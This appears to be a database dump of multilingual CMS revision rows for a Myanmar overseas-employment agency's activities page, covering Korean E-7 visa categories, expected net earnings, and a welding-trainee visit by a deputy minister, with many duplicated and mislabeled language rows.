('activities', 0, 7, 154, 'en', 0, '<p>E-7 visa</p><p>It\'s a special ability visa for foreign nationals. It\'s also divided into categories</p><p>E-7-1 visa (Professionals) This is a visa given to managers and experts in a particular field.</p><p>E-7-2 visa (Semi-professionals) This is a visa for people who work in office jobs or service.</p><p>E-7-3 visa (Technicians) Technicians. This is a visa for those working in the technical field</p><p>E-7-4 visa (Experienced Technicians) is an experienced technician visa. Usually, workers with more than 5 years of experience are transferred from E-9.</p>', '', 'full_html'),
('activities', 0, 7, 154, 'ja', 0, '<p>E-7 visa</p><p>နိုင်ငံခြား နိုင်ငံသား အထူးစွမ်းရည်ဗီဇာပါ။ အဲမှာလည်း အမျိုးစား ထပ်ခွဲထားပါသေးတယ်</p><p>E-7-1 visa (Professionals) Managers တွေနဲ့ နယ်ပယ်တခုခုမှာ တတ်ကျွမ်းနားလည်တဲ့ ပညာရှင်တွေကို ပေးတဲ့ ဗီဇာပါ</p><p>E-7-2 visa (Semi-professionals) Office အလုပ်တွေရယ် ဒါမှမဟုတ် service ပိုင်းဆိုင်ရာ တာဝန်ထမ်းဆောင်နေတဲ့သူတွေ ရရှိတဲ့ ဗီဇာပါ</p><p>E-7-3 visa (Technicians) နည်းပညာ ပညာရှင်။ နည်းပညာပိုင်းဆိုင်ရာ နယ်ပယ်မှာ လုပ်ကိုင်နေသူတွေ ရရှိတဲ့ ဗီဇာပါ</p><p>E-7-4 visa (Experienced Technicians) အတွေ့ကြုံရှိ ပညာရှင်ဗီဇာပါ။ များသောအားဖြင့် လုပ်သက် ၅နှစ်အထက် အတွေ့ကြုံရှိ လုပ်သားတွေ E-9 ကနေ ပြောင်းလာရင် ရရှိတဲ့ ဗီဇာလည်း ဖြစ်ပါတယ်တဲ့ (အမှတ်အပေါ်မူတည်ပြီး ပေးတယ်လို့လည်း သိရပါတယ်)</p><p>E-7 visa</p><p>It\'s a special ability visa for foreign nationals. It\'s also divided into categories</p><p>E-7-1 visa (Professionals) This is a visa given to managers and experts in a particular field.</p><p>E-7-2 visa (Semi-professionals) This is a visa for people who work in office jobs or service.</p><p>E-7-3 visa (Technicians) Technicians. This is a visa for those working in the technical field</p><p>E-7-4 visa (Experienced Technicians) is an experienced technician visa. Usually, workers with more than 5 years of experience are transferred from E-9.</p>', '', 'full_html'),
('activities', 0, 7, 154, 'ko', 0, '<p>E-7 visa</p><p>နိုင်ငံခြား နိုင်ငံသား အထူးစွမ်းရည်ဗီဇာပါ။ အဲမှာလည်း အမျိုးစား ထပ်ခွဲထားပါသေးတယ်</p><p>E-7-1 visa (Professionals) Managers တွေနဲ့ နယ်ပယ်တခုခုမှာ တတ်ကျွမ်းနားလည်တဲ့ ပညာရှင်တွေကို ပေးတဲ့ ဗီဇာပါ</p><p>E-7-2 visa (Semi-professionals) Office အလုပ်တွေရယ် ဒါမှမဟုတ် service ပိုင်းဆိုင်ရာ တာဝန်ထမ်းဆောင်နေတဲ့သူတွေ ရရှိတဲ့ ဗီဇာပါ</p><p>E-7-3 visa (Technicians) နည်းပညာ ပညာရှင်။ နည်းပညာပိုင်းဆိုင်ရာ နယ်ပယ်မှာ လုပ်ကိုင်နေသူတွေ ရရှိတဲ့ ဗီဇာပါ</p><p>E-7-4 visa (Experienced Technicians) အတွေ့ကြုံရှိ ပညာရှင်ဗီဇာပါ။ များသောအားဖြင့် လုပ်သက် ၅နှစ်အထက် အတွေ့ကြုံရှိ လုပ်သားတွေ E-9 ကနေ ပြောင်းလာရင် ရရှိတဲ့ ဗီဇာလည်း ဖြစ်ပါတယ်တဲ့ (အမှတ်အပေါ်မူတည်ပြီး ပေးတယ်လို့လည်း သိရပါတယ်)</p><p>E-7 visa</p><p>It\'s a special ability visa for foreign nationals. It\'s also divided into categories</p><p>E-7-1 visa (Professionals) This is a visa given to managers and experts in a particular field.</p><p>E-7-2 visa (Semi-professionals) This is a visa for people who work in office jobs or service.</p><p>E-7-3 visa (Technicians) Technicians. This is a visa for those working in the technical field</p><p>E-7-4 visa (Experienced Technicians) is an experienced technician visa. Usually, workers with more than 5 years of experience are transferred from E-9.</p>', '', 'full_html'),
('activities', 0, 7, 216, 'en', 0, '<p>E-7 visa</p><p>It\'s a special ability visa for foreign nationals. It\'s also divided into categories</p><p>E-7-1 visa (Professionals) This is a visa given to managers and experts in a particular field.</p><p>E-7-2 visa (Semi-professionals) This is a visa for people who work in office jobs or service.</p><p>E-7-3 visa (Technicians) Technicians. This is a visa for those working in the technical field</p><p>E-7-4 visa (Experienced Technicians) is an experienced technician visa. Usually, workers with more than 5 years of experience are transferred from E-9.</p>', '', 'full_html'),
('activities', 0, 7, 216, 'ja', 0, '<p>E-7ビザは外国人に対する特定能力を持つ方のための特別なビザであり、以下のカテゴリーに分けられています：</p><p>E-7-1ビザ（専門家）：特定の分野の管理職や専門家に対して与えられるビザです。</p><p>E-7-2ビザ（準専門職）：オフィスの仕事やサービス業に従事する方に対するビザです。</p><p>E-7-3ビザ（技術者）：技術分野で働く方に対するビザです。</p><p>E-7-4ビザ（経験豊富な技術者）：経験豊富な技術者向けのビザで、通常、5年以上の経験を持つ労働者はE-9から移行します。</p>', '', 'full_html'),
('activities', 0, 7, 216, 'ko', 0, '<p>E-7 visa</p><p>နိုင်ငံခြား နိုင်ငံသား အထူးစွမ်းရည်ဗီဇာပါ။ အဲမှာလည်း အမျိုးစား ထပ်ခွဲထားပါသေးတယ်</p><p>E-7-1 visa (Professionals) Managers တွေနဲ့ နယ်ပယ်တခုခုမှာ တတ်ကျွမ်းနားလည်တဲ့ ပညာရှင်တွေကို ပေးတဲ့ ဗီဇာပါ</p><p>E-7-2 visa (Semi-professionals) Office အလုပ်တွေရယ် ဒါမှမဟုတ် service ပိုင်းဆိုင်ရာ တာဝန်ထမ်းဆောင်နေတဲ့သူတွေ ရရှိတဲ့ ဗီဇာပါ</p><p>E-7-3 visa (Technicians) နည်းပညာ ပညာရှင်။ နည်းပညာပိုင်းဆိုင်ရာ နယ်ပယ်မှာ လုပ်ကိုင်နေသူတွေ ရရှိတဲ့ ဗီဇာပါ</p><p>E-7-4 visa (Experienced Technicians) အတွေ့ကြုံရှိ ပညာရှင်ဗီဇာပါ။ များသောအားဖြင့် လုပ်သက် ၅နှစ်အထက် အတွေ့ကြုံရှိ လုပ်သားတွေ E-9 ကနေ ပြောင်းလာရင် ရရှိတဲ့ ဗီဇာလည်း ဖြစ်ပါတယ်တဲ့ (အမှတ်အပေါ်မူတည်ပြီး ပေးတယ်လို့လည်း သိရပါတယ်)</p><p>E-7 visa</p><p>It\'s a special ability visa for foreign nationals. It\'s also divided into categories</p><p>E-7-1 visa (Professionals) This is a visa given to managers and experts in a particular field.</p><p>E-7-2 visa (Semi-professionals) This is a visa for people who work in office jobs or service.</p><p>E-7-3 visa (Technicians) Technicians. This is a visa for those working in the technical field</p><p>E-7-4 visa (Experienced Technicians) is an experienced technician visa. Usually, workers with more than 5 years of experience are transferred from E-9.</p>', '', 'full_html'),
('activities', 0, 7, 288, 'en', 0, '<p>E-7 visa</p><p>It\'s a special ability visa for foreign nationals. It\'s also divided into categories</p><p>E-7-1 visa (Professionals) This is a visa given to managers and experts in a particular field.</p><p>E-7-2 visa (Semi-professionals) This is a visa for people who work in office jobs or service.</p><p>E-7-3 visa (Technicians) Technicians. This is a visa for those working in the technical field</p><p>E-7-4 visa (Experienced Technicians) is an experienced technician visa. Usually, workers with more than 5 years of experience are transferred from E-9.</p>', '', 'full_html'),
('activities', 0, 7, 288, 'ja', 0, '<p>E-7ビザは外国人に対する特定能力を持つ方のための特別なビザであり、以下のカテゴリーに分けられています：</p><p>E-7-1ビザ（専門家）：特定の分野の管理職や専門家に対して与えられるビザです。</p><p>E-7-2ビザ（準専門職）：オフィスの仕事やサービス業に従事する方に対するビザです。</p><p>E-7-3ビザ（技術者）：技術分野で働く方に対するビザです。</p><p>E-7-4ビザ（経験豊富な技術者）：経験豊富な技術者向けのビザで、通常、5年以上の経験を持つ労働者はE-9から移行します。</p>', '', 'full_html'),
('activities', 0, 7, 288, 'ko', 0, '<p>E-7 visa</p><p>နိုင်ငံခြား နိုင်ငံသား အထူးစွမ်းရည်ဗီဇာပါ။ အဲမှာလည်း အမျိုးစား ထပ်ခွဲထားပါသေးတယ်</p><p>E-7-1 visa (Professionals) Managers တွေနဲ့ နယ်ပယ်တခုခုမှာ တတ်ကျွမ်းနားလည်တဲ့ ပညာရှင်တွေကို ပေးတဲ့ ဗီဇာပါ</p><p>E-7-2 visa (Semi-professionals) Office အလုပ်တွေရယ် ဒါမှမဟုတ် service ပိုင်းဆိုင်ရာ တာဝန်ထမ်းဆောင်နေတဲ့သူတွေ ရရှိတဲ့ ဗီဇာပါ</p><p>E-7-3 visa (Technicians) နည်းပညာ ပညာရှင်။ နည်းပညာပိုင်းဆိုင်ရာ နယ်ပယ်မှာ လုပ်ကိုင်နေသူတွေ ရရှိတဲ့ ဗီဇာပါ</p><p>E-7-4 visa (Experienced Technicians) အတွေ့ကြုံရှိ ပညာရှင်ဗီဇာပါ။ များသောအားဖြင့် လုပ်သက် ၅နှစ်အထက် အတွေ့ကြုံရှိ လုပ်သားတွေ E-9 ကနေ ပြောင်းလာရင် ရရှိတဲ့ ဗီဇာလည်း ဖြစ်ပါတယ်တဲ့ (အမှတ်အပေါ်မူတည်ပြီး ပေးတယ်လို့လည်း သိရပါတယ်)</p><p>E-7 visa</p><p>It\'s a special ability visa for foreign nationals. It\'s also divided into categories</p><p>E-7-1 visa (Professionals) This is a visa given to managers and experts in a particular field.</p><p>E-7-2 visa (Semi-professionals) This is a visa for people who work in office jobs or service.</p><p>E-7-3 visa (Technicians) Technicians. This is a visa for those working in the technical field</p><p>E-7-4 visa (Experienced Technicians) is an experienced technician visa. Usually, workers with more than 5 years of experience are transferred from E-9.</p>', '', 'full_html'),
('activities', 0, 8, 13, 'en', 0, '<p>&nbsp;Overtime တစ်နေ့ ၃ နာရီနှင့် (၂၂) ရက်လောက်ဆင်း၍ ရရှိမည့်ငွေနှင့် အခြားနေထိုင် စားသောက်စရိတ်၊ ကျန်းမာရေးအာမခံနှင့် ၀င်ငွေခွန် ကုန်ကျစရိတ်များ နှုတ်ပြီးလျှင် မြန်မာငွေ သိန်း ၅၀အထက်လောက် ကျန်နိုင်ပါသည်။&nbsp;</p>', '', 'full_html'),
('activities', 0, 8, 23, 'en', 0, '<p>&nbsp;Overtime တစ်နေ့ ၃ နာရီနှင့် (၂၂) ရက်လောက်ဆင်း၍ ရရှိမည့်ငွေနှင့် အခြားနေထိုင် စားသောက်စရိတ်၊ ကျန်းမာရေးအာမခံနှင့် ၀င်ငွေခွန် ကုန်ကျစရိတ်များ နှုတ်ပြီးလျှင် မြန်မာငွေ သိန်း ၅၀အထက်လောက် ကျန်နိုင်ပါသည်။&nbsp;</p>', '', 'full_html'),
('activities', 0, 8, 110, 'en', 0, '<p>&nbsp;Overtime တစ်နေ့ ၃ နာရီနှင့် (၂၂) ရက်လောက်ဆင်း၍ ရရှိမည့်ငွေနှင့် အခြားနေထိုင် စားသောက်စရိတ်၊ ကျန်းမာရေးအာမခံနှင့် ၀င်ငွေခွန် ကုန်ကျစရိတ်များ နှုတ်ပြီးလျှင် မြန်မာငွေ သိန်း ၅၀အထက်လောက် ကျန်နိုင်ပါသည်။&nbsp;</p>', '', 'full_html'),
('activities', 0, 8, 110, 'ja', 0, '<p>&nbsp;Overtime တစ်နေ့ ၃ နာရီနှင့် (၂၂) ရက်လောက်ဆင်း၍ ရရှိမည့်ငွေနှင့် အခြားနေထိုင် စားသောက်စရိတ်၊ ကျန်းမာရေးအာမခံနှင့် ၀င်ငွေခွန် ကုန်ကျစရိတ်များ နှုတ်ပြီးလျှင် မြန်မာငွေ သိန်း ၅၀အထက်လောက် ကျန်နိုင်ပါသည်။&nbsp;</p>', '', 'full_html'),
('activities', 0, 8, 111, 'en', 0, '<p>&nbsp;Overtime တစ်နေ့ ၃ နာရီနှင့် (၂၂) ရက်လောက်ဆင်း၍ ရရှိမည့်ငွေနှင့် အခြားနေထိုင် စားသောက်စရိတ်၊ ကျန်းမာရေးအာမခံနှင့် ၀င်ငွေခွန် ကုန်ကျစရိတ်များ နှုတ်ပြီးလျှင် မြန်မာငွေ သိန်း ၅၀အထက်လောက် ကျန်နိုင်ပါသည်။&nbsp;</p>', '', 'full_html'),
('activities', 0, 8, 111, 'ja', 0, '<p>&nbsp;Overtime တစ်နေ့ ၃ နာရီနှင့် (၂၂) ရက်လောက်ဆင်း၍ ရရှိမည့်ငွေနှင့် အခြားနေထိုင် စားသောက်စရိတ်၊ ကျန်းမာရေးအာမခံနှင့် ၀င်ငွေခွန် ကုန်ကျစရိတ်များ နှုတ်ပြီးလျှင် မြန်မာငွေ သိန်း ၅၀အထက်လောက် ကျန်နိုင်ပါသည်။&nbsp;</p>', '', 'full_html'),
('activities', 0, 8, 111, 'ko', 0, '<p>&nbsp;Overtime တစ်နေ့ ၃ နာရီနှင့် (၂၂) ရက်လောက်ဆင်း၍ ရရှိမည့်ငွေနှင့် အခြားနေထိုင် စားသောက်စရိတ်၊ ကျန်းမာရေးအာမခံနှင့် ၀င်ငွေခွန် ကုန်ကျစရိတ်များ နှုတ်ပြီးလျှင် မြန်မာငွေ သိန်း ၅၀အထက်လောက် ကျန်နိုင်ပါသည်။&nbsp;</p>', '', 'full_html'),
('activities', 0, 8, 112, 'en', 0, '<p>&nbsp;Overtime တစ်နေ့ ၃ နာရီနှင့် (၂၂) ရက်လောက်ဆင်း၍ ရရှိမည့်ငွေနှင့် အခြားနေထိုင် စားသောက်စရိတ်၊ ကျန်းမာရေးအာမခံနှင့် ၀င်ငွေခွန် ကုန်ကျစရိတ်များ နှုတ်ပြီးလျှင် မြန်မာငွေ သိန်း ၅၀အထက်လောက် ကျန်နိုင်ပါသည်။&nbsp;</p>', '', 'full_html'),
('activities', 0, 8, 112, 'ja', 0, '<p>&nbsp;Overtime တစ်နေ့ ၃ နာရီနှင့် (၂၂) ရက်လောက်ဆင်း၍ ရရှိမည့်ငွေနှင့် အခြားနေထိုင် စားသောက်စရိတ်၊ ကျန်းမာရေးအာမခံနှင့် ၀င်ငွေခွန် ကုန်ကျစရိတ်များ နှုတ်ပြီးလျှင် မြန်မာငွေ သိန်း ၅၀အထက်လောက် ကျန်နိုင်ပါသည်။&nbsp;</p>', '', 'full_html'),
('activities', 0, 8, 112, 'ko', 0, '<p>&nbsp;Overtime တစ်နေ့ ၃ နာရီနှင့် (၂၂) ရက်လောက်ဆင်း၍ ရရှိမည့်ငွေနှင့် အခြားနေထိုင် စားသောက်စရိတ်၊ ကျန်းမာရေးအာမခံနှင့် ၀င်ငွေခွန် ကုန်ကျစရိတ်များ နှုတ်ပြီးလျှင် မြန်မာငွေ သိန်း ၅၀အထက်လောက် ကျန်နိုင်ပါသည်။&nbsp;</p>', '', 'full_html'),
('activities', 0, 8, 113, 'en', 0, '<p>&nbsp;Overtime တစ်နေ့ ၃ နာရီနှင့် (၂၂) ရက်လောက်ဆင်း၍ ရရှိမည့်ငွေနှင့် အခြားနေထိုင် စားသောက်စရိတ်၊ ကျန်းမာရေးအာမခံနှင့် ၀င်ငွေခွန် ကုန်ကျစရိတ်များ နှုတ်ပြီးလျှင် မြန်မာငွေ သိန်း ၅၀အထက်လောက် ကျန်နိုင်ပါသည်။&nbsp;</p>', '', 'full_html'),
('activities', 0, 8, 113, 'ja', 0, '<p>&nbsp;Overtime တစ်နေ့ ၃ နာရီနှင့် (၂၂) ရက်လောက်ဆင်း၍ ရရှိမည့်ငွေနှင့် အခြားနေထိုင် စားသောက်စရိတ်၊ ကျန်းမာရေးအာမခံနှင့် ၀င်ငွေခွန် ကုန်ကျစရိတ်များ နှုတ်ပြီးလျှင် မြန်မာငွေ သိန်း ၅၀အထက်လောက် ကျန်နိုင်ပါသည်။&nbsp;</p>', '', 'full_html'),
('activities', 0, 8, 113, 'ko', 0, '<p>&nbsp;Overtime တစ်နေ့ ၃ နာရီနှင့် (၂၂) ရက်လောက်ဆင်း၍ ရရှိမည့်ငွေနှင့် အခြားနေထိုင် စားသောက်စရိတ်၊ ကျန်းမာရေးအာမခံနှင့် ၀င်ငွေခွန် ကုန်ကျစရိတ်များ နှုတ်ပြီးလျှင် မြန်မာငွေ သိန်း ၅၀အထက်လောက် ကျန်နိုင်ပါသည်။ tt</p>', '', 'full_html'),
('activities', 0, 8, 114, 'en', 0, '<p>&nbsp;Overtime တစ်နေ့ ၃ နာရီနှင့် (၂၂) ရက်လောက်ဆင်း၍ ရရှိမည့်ငွေနှင့် အခြားနေထိုင် စားသောက်စရိတ်၊ ကျန်းမာရေးအာမခံနှင့် ၀င်ငွေခွန် ကုန်ကျစရိတ်များ နှုတ်ပြီးလျှင် မြန်မာငွေ သိန်း ၅၀အထက်လောက် ကျန်နိုင်ပါသည်။&nbsp;</p>', '', 'full_html'),
('activities', 0, 8, 114, 'ja', 0, '<p>&nbsp;Overtime တစ်နေ့ ၃ နာရီနှင့် (၂၂) ရက်လောက်ဆင်း၍ ရရှိမည့်ငွေနှင့် အခြားနေထိုင် စားသောက်စရိတ်၊ ကျန်းမာရေးအာမခံနှင့် ၀င်ငွေခွန် ကုန်ကျစရိတ်များ နှုတ်ပြီးလျှင် မြန်မာငွေ သိန်း ၅၀အထက်လောက် ကျန်နိုင်ပါသည်။&nbsp;</p>', '', 'full_html'),
('activities', 0, 8, 114, 'ko', 0, '<p>&nbsp;Overtime တစ်နေ့ ၃ နာရီနှင့် (၂၂) ရက်လောက်ဆင်း၍ ရရှိမည့်ငွေနှင့် အခြားနေထိုင် စားသောက်စရိတ်၊ ကျန်းမာရေးအာမခံနှင့် ၀င်ငွေခွန် ကုန်ကျစရိတ်များ နှုတ်ပြီးလျှင် မြန်မာငွေ သိန်း ၅၀အထက်လောက် ကျန်နိုင်ပါသည်။&nbsp;</p>', '', 'full_html'),
('activities', 0, 8, 152, 'en', 0, '<p>&nbsp;Overtime 3 hours a day and (22) days off, After deducting money to be earned and other living and dining expenses, health insurance and income tax expenses, there may be more than 50,000,000 MMK left.</p>', '', 'full_html'),
('activities', 0, 8, 152, 'ja', 0, '<p>&nbsp;Overtime တစ်နေ့ ၃ နာရီနှင့် (၂၂) ရက်လောက်ဆင်း၍ ရရှိမည့်ငွေနှင့် အခြားနေထိုင် စားသောက်စရိတ်၊ ကျန်းမာရေးအာမခံနှင့် ၀င်ငွေခွန် ကုန်ကျစရိတ်များ နှုတ်ပြီးလျှင် မြန်မာငွေ သိန်း ၅၀အထက်လောက် ကျန်နိုင်ပါသည်။&nbsp;</p>', '', 'full_html'),
('activities', 0, 8, 152, 'ko', 0, '<p>&nbsp;Overtime တစ်နေ့ ၃ နာရီနှင့် (၂၂) ရက်လောက်ဆင်း၍ ရရှိမည့်ငွေနှင့် အခြားနေထိုင် စားသောက်စရိတ်၊ ကျန်းမာရေးအာမခံနှင့် ၀င်ငွေခွန် ကုန်ကျစရိတ်များ နှုတ်ပြီးလျှင် မြန်မာငွေ သိန်း ၅၀အထက်လောက် ကျန်နိုင်ပါသည်။&nbsp;</p>', '', 'full_html'),
('activities', 0, 8, 215, 'en', 0, '<p>&nbsp;Overtime 3 hours a day and (22) days off, After deducting money to be earned and other living and dining expenses, health insurance and income tax expenses, there may be more than 50,000,000 MMK left.</p>', '', 'full_html'),
('activities', 0, 8, 215, 'ja', 0, '<p>&nbsp;1日3時間の残業と（22日）の休暇があり、収入から差し引かれるべき金額や生活費、食費、健康保険、所得税などの経費を差し引いた後、50,000,000 MMK以上が残る可能性があります。</p>', '', 'full_html'),
('activities', 0, 8, 215, 'ko', 0, '<p>&nbsp;Overtime တစ်နေ့ ၃ နာရီနှင့် (၂၂) ရက်လောက်ဆင်း၍ ရရှိမည့်ငွေနှင့် အခြားနေထိုင် စားသောက်စရိတ်၊ ကျန်းမာရေးအာမခံနှင့် ၀င်ငွေခွန် ကုန်ကျစရိတ်များ နှုတ်ပြီးလျှင် မြန်မာငွေ သိန်း ၅၀အထက်လောက် ကျန်နိုင်ပါသည်။&nbsp;</p>', '', 'full_html'),
('activities', 0, 9, 14, 'en', 0, '<img data-entity-uuid=\"4e0faeac-bf6f-4f01-b21b-65098313010c\" data-entity-type=\"file\" src=\"/new_comet/sites/default/files/inline-images/new_comet_activities.jpg\" data-align=\"center\"><p><br>ဆင်မလိုက် သင်္ဘောကျင်းမှ NEW COMET TRADING AGENCY CO.,LTD မှ ပထမအသုတ် ဂဟေဆော် သင်တန်းသားများအား ပို့ဆောင်ရေးနှင့် ဆက်သွယ်ရေးဝန်ကြီးဌာနမှ ဒုဝန်ကြီးမှ လာရောက်တွေ့ဆုံ၍ အမှာစကားများ ပြောကြားပေးပြီး သင်တန်းကျောင်းအား လာရောက်စစ်ဆေးသည်။</p>', '', 'full_html'),
('activities', 0, 9, 15, 'en', 0, '<img src=\"/new_comet/sites/default/files/inline-images/new_comet_activities.jpg\" data-align=\"center\" data-entity-uuid=\"4e0faeac-bf6f-4f01-b21b-65098313010c\" data-entity-type=\"file\"><p><br>ဆင်မလိုက် သင်္ဘောကျင်းမှ NEW COMET TRADING AGENCY CO.,LTD မှ ပထမအသုတ် ဂဟေဆော် သင်တန်းသားများအား ပို့ဆောင်ရေးနှင့် ဆက်သွယ်ရေးဝန်ကြီးဌာနမှ ဒုဝန်ကြီးမှ လာရောက်တွေ့ဆုံ၍ အမှာစကားများ ပြောကြားပေးပြီး သင်တန်းကျောင်းအား လာရောက်စစ်ဆေးသည်။</p>', '', 'full_html'),
('activities', 0, 9, 34, 'en', 0, '<img src=\"/new_comet/sites/default/files/inline-images/new_comet_activities.jpg\" data-align=\"center\" data-entity-uuid=\"4e0faeac-bf6f-4f01-b21b-65098313010c\" data-entity-type=\"file\"><p>ဆင်မလိုက် သင်္ဘောကျင်းမှ NEW COMET TRADING AGENCY CO.,LTD မှ ပထမအသုတ် ဂဟေဆော် သင်တန်းသားများအား ပို့ဆောင်ရေးနှင့် ဆက်သွယ်ရေးဝန်ကြီးဌာနမှ ဒုဝန်ကြီးမှ လာရောက်တွေ့ဆုံ၍ အမှာစကားများ ပြောကြားပေးပြီး သင်တန်းကျောင်းအား လာရောက်စစ်ဆေးသည်။</p>', '', 'full_html'),
('activities', 0, 9, 44, 'en', 0, '<img src=\"/sites/default/files/inline-images/new_comet_activities.jpg\" data-align=\"center\" data-entity-uuid=\"4e0faeac-bf6f-4f01-b21b-65098313010c\" data-entity-type=\"file\"><p>ဆင်မလိုက် သင်္ဘောကျင်းမှ NEW COMET TRADING AGENCY CO.,LTD မှ ပထမအသုတ် ဂဟေဆော် သင်တန်းသားများအား ပို့ဆောင်ရေးနှင့် ဆက်သွယ်ရေး ဝန်ကြီးဌာနမှ ဒုဝန်ကြီးမှ လာရောက်တွေ့ဆုံ၍ အမှာစကားများ ပြောကြားပေးပြီး သင်တန်းကျောင်းအား လာရောက်စစ်ဆေးသည်။</p>', '', 'full_html'),
('activities', 0, 9, 62, 'en', 0, '<img src=\"/sites/default/files/inline-images/new_comet_activities.jpg\" data-align=\"center\" data-entity-uuid=\"4e0faeac-bf6f-4f01-b21b-65098313010c\" data-entity-type=\"file\"><p>ဆင်မလိုက် သင်္ဘောကျင်းမှ NEW COMET TRADING AGENCY CO.,LTD မှ ပထမအသုတ် ဂဟေဆော် သင်တန်းသားများအား ပို့ဆောင်ရေးနှင့် ဆက်သွယ်ရေး ဝန်ကြီးဌာနမှ ဒုဝန်ကြီးမှ လာရောက်တွေ့ဆုံ၍ အမှာစကားများ ပြောကြားပေးပြီး သင်တန်းကျောင်းအား လာရောက်စစ်ဆေးသည်။</p>', '', 'full_html'),
('activities', 0, 9, 121, 'en', 0, '<img src=\"/sites/default/files/inline-images/new_comet_activities.jpg\" data-align=\"center\" data-entity-uuid=\"4e0faeac-bf6f-4f01-b21b-65098313010c\" data-entity-type=\"file\"><p>ဆင်မလိုက် သင်္ဘောကျင်းမှ NEW COMET TRADING AGENCY CO.,LTD မှ ပထမအသုတ် ဂဟေဆော် သင်တန်းသားများအား ပို့ဆောင်ရေးနှင့် ဆက်သွယ်ရေး ဝန်ကြီးဌာနမှ ဒုဝန်ကြီးမှ လာရောက်တွေ့ဆုံ၍ အမှာစကားများ ပြောကြားပေးပြီး သင်တန်းကျောင်းအား လာရောက်စစ်ဆေးသည်။</p>', '', 'full_html'),
('activities', 0, 9, 121, 'ja', 0, '<img src=\"/sites/default/files/inline-images/new_comet_activities.jpg\" data-align=\"center\" data-entity-uuid=\"4e0faeac-bf6f-4f01-b21b-65098313010c\" data-entity-type=\"file\"><p>ဆင်မလိုက် သင်္ဘောကျင်းမှ NEW COMET TRADING AGENCY CO.,LTD မှ ပထမအသုတ် ဂဟေဆော် သင်တန်းသားများအား ပို့ဆောင်ရေးနှင့် ဆက်သွယ်ရေး ဝန်ကြီးဌာနမှ ဒုဝန်ကြီးမှ လာရောက်တွေ့ဆုံ၍ အမှာစကားများ ပြောကြားပေးပြီး သင်တန်းကျောင်းအား လာရောက်စစ်ဆေးသည်။</p>', '', 'full_html'),
('activities', 0, 9, 122, 'en', 0, '<img src=\"/sites/default/files/inline-images/new_comet_activities.jpg\" data-align=\"center\" data-entity-uuid=\"4e0faeac-bf6f-4f01-b21b-65098313010c\" data-entity-type=\"file\"><p>ဆင်မလိုက် သင်္ဘောကျင်းမှ NEW COMET TRADING AGENCY CO.,LTD မှ ပထမအသုတ် ဂဟေဆော် သင်တန်းသားများအား ပို့ဆောင်ရေးနှင့် ဆက်သွယ်ရေး ဝန်ကြီးဌာနမှ ဒုဝန်ကြီးမှ လာရောက်တွေ့ဆုံ၍ အမှာစကားများ ပြောကြားပေးပြီး သင်တန်းကျောင်းအား လာရောက်စစ်ဆေးသည်။</p>', '', 'full_html'),
('activities', 0, 9, 122, 'ja', 0, '<img src=\"/sites/default/files/inline-images/new_comet_activities.jpg\" data-align=\"center\" data-entity-uuid=\"4e0faeac-bf6f-4f01-b21b-65098313010c\" data-entity-type=\"file\"><p>ဆင်မလိုက် သင်္ဘောကျင်းမှ NEW COMET TRADING AGENCY CO.,LTD မှ ပထမအသုတ် ဂဟေဆော် သင်တန်းသားများအား ပို့ဆောင်ရေးနှင့် ဆက်သွယ်ရေး ဝန်ကြီးဌာနမှ ဒုဝန်ကြီးမှ လာရောက်တွေ့ဆုံ၍ အမှာစကားများ ပြောကြားပေးပြီး သင်တန်းကျောင်းအား လာရောက်စစ်ဆေးသည်။</p>', '', 'full_html'),
('activities', 0, 9, 122, 'ko', 0, '<img src=\"/sites/default/files/inline-images/new_comet_activities.jpg\" data-align=\"center\" data-entity-uuid=\"4e0faeac-bf6f-4f01-b21b-65098313010c\" data-entity-type=\"file\"><p>ဆင်မလိုက် သင်္ဘောကျင်းမှ NEW COMET TRADING AGENCY CO.,LTD မှ ပထမအသုတ် ဂဟေဆော် သင်တန်းသားများအား ပို့ဆောင်ရေးနှင့် ဆက်သွယ်ရေး ဝန်ကြီးဌာနမှ ဒုဝန်ကြီးမှ လာရောက်တွေ့ဆုံ၍ အမှာစကားများ ပြောကြားပေးပြီး သင်တန်းကျောင်းအား လာရောက်စစ်ဆေးသည်။</p>', '', 'full_html'),
('activities', 0, 9, 150, 'en', 0, '<img src=\"/sites/default/files/inline-images/new_comet_activities.jpg\" data-align=\"center\" data-entity-uuid=\"4e0faeac-bf6f-4f01-b21b-65098313010c\" data-entity-type=\"file\"><p>The first batch of welding trainees from NEW COMET TRADING AGENCY CO.,LTD from Sinmalike Shipyard was met by the Deputy Minister of the Ministry of Transport and Communications and gave speeches and inspected the training school.</p>', '', 'full_html'),
('activities', 0, 9, 150, 'ja', 0, '<img src=\"/sites/default/files/inline-images/new_comet_activities.jpg\" data-align=\"center\" data-entity-uuid=\"4e0faeac-bf6f-4f01-b21b-65098313010c\" data-entity-type=\"file\"><p>ဆင်မလိုက် သင်္ဘောကျင်းမှ NEW COMET TRADING AGENCY CO.,LTD မှ ပထမအသုတ် ဂဟေဆော် သင်တန်းသားများအား ပို့ဆောင်ရေးနှင့် ဆက်သွယ်ရေး ဝန်ကြီးဌာနမှ ဒုဝန်ကြီးမှ လာရောက်တွေ့ဆုံ၍ အမှာစကားများ ပြောကြားပေးပြီး သင်တန်းကျောင်းအား လာရောက်စစ်ဆေးသည်။</p>', '', 'full_html'),
('activities', 0, 9, 150, 'ko', 0, '<img src=\"/sites/default/files/inline-images/new_comet_activities.jpg\" data-align=\"center\" data-entity-uuid=\"4e0faeac-bf6f-4f01-b21b-65098313010c\" data-entity-type=\"file\"><p>ဆင်မလိုက် သင်္ဘောကျင်းမှ NEW COMET TRADING AGENCY CO.,LTD မှ ပထမအသုတ် ဂဟေဆော် သင်တန်းသားများအား ပို့ဆောင်ရေးနှင့် ဆက်သွယ်ရေး ဝန်ကြီးဌာနမှ ဒုဝန်ကြီးမှ လာရောက်တွေ့ဆုံ၍ အမှာစကားများ ပြောကြားပေးပြီး သင်တန်းကျောင်းအား လာရောက်စစ်ဆေးသည်။</p>', '', 'full_html'),
('activities', 0, 9, 187, 'en', 0, '<img src=\"/sites/default/files/inline-images/new_comet_activities.jpg\" data-align=\"center\" data-entity-uuid=\"4e0faeac-bf6f-4f01-b21b-65098313010c\" data-entity-type=\"file\"><p>The first batch of welding trainees from NEW COMET TRADING AGENCY CO.,LTD from Sinmalike Shipyard was met by the Deputy Minister of the Ministry of Transport and Communications and gave speeches and inspected the training school.</p>', '', 'full_html'),
